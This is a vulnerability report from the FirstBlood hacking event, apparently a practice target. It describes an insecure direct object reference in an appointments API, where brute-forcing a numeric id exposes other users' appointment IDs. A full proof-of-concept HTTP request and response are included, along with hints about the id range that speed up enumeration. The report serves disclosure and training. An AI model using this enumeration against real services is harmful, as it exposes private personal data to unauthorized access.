FirstBlood-#58Aptid enumeration via http://firstbloodhackers.com:49276/api/qa.php can be used to leak Appointment data



On 2021-05-09, 0xconft reported:

Hi there,

The http://firstbloodhackers.com:49276/api/qa.php can be used to leak user's Appointment data by simply bruteforcing the id parameter of that endpoint. Attacker can validate the correct id by simply grepping response that contain "success" word. I also noticed the aptid start from 56910000 which can be used to makes the bruteforcing process faster

PoC where id 56911356 will return aptid of john smith (294b1ccb-de2f-4685-821a-9e4d26009b44 )

Request

POST /api/qa.php HTTP/1.1
Host: firstbloodhackers.com:49276
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
Origin: http://firstbloodhackers.com:49276
Connection: close
Referer: http://firstbloodhackers.com:49276/yourappointments.php

id=56911356

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 09 May 2021 18:16:17 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 73

/manageappointment.php?success&aptid=294b1ccb-de2f-4685-821a-9e4d26009b44

Best Regards, 0xconft

P2 High

Endpoint: /api/qa.php

Parameter: id

Payload: XXXXXXXX where each X is decimal number


FirstBlood ID: 5
Vulnerability Type: IDOR

The endpoint QA.php (to query for an appointment) will allow for integer values to be used when querying for appointments. A bad cause of security through obscurity was attempted.


Respect Earnt: 1000000
RESPECT ($RSP) is an experimental cryptocurrency based on the Ethereum blockchain with the mission to show respect to those who deserve it. We are testing it out on our FirstBlood hackevent.